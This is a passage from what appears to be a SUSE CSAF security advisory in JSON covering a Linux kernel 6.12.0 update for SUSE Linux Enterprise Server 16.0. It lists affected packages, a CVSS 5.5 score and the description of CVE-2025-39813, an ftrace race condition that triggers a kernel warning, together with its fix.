"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39795"
},
{
"cve": "CVE-2025-39813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix potential warning in trace_printk_seq during ftrace_dump\n\nWhen calling ftrace_dump_one() concurrently with reading trace_pipe,\na WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race\ncondition.\n\nThe issue occurs because:\n\nCPU0 (ftrace_dump) CPU1 (reader)\necho z \u003e /proc/sysrq-trigger\n\n!trace_empty(\u0026iter)\ntrace_iterator_reset(\u0026iter) \u003c- len = size = 0\n cat /sys/kernel/tracing/trace_pipe\ntrace_find_next_entry_inc(\u0026iter)\n __find_next_entry\n ring_buffer_empty_cpu \u003c- all empty\n return NULL\n\ntrace_printk_seq(\u0026iter.seq)\n WARN_ON_ONCE(s-\u003eseq.len \u003e= s-\u003eseq.size)\n\nIn the context between trace_empty() and trace_find_next_entry_inc()\nduring ftrace_dump, the ring buffer data was consumed by other readers.\nThis caused trace_find_next_entry_inc to return NULL, failing to populate\n`iter.seq`. At this point, due to the prior trace_iterator_reset, both\n`iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal,\nthe WARN_ON_ONCE condition is triggered.\n\nMove the trace_printk_seq() into the if block that checks to make sure the\nreturn value of trace_find_next_entry_inc() is non-NULL in\nftrace_dump_one(), ensuring the \u0027iter.seq\u0027 is properly populated before\nsubsequent operations.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
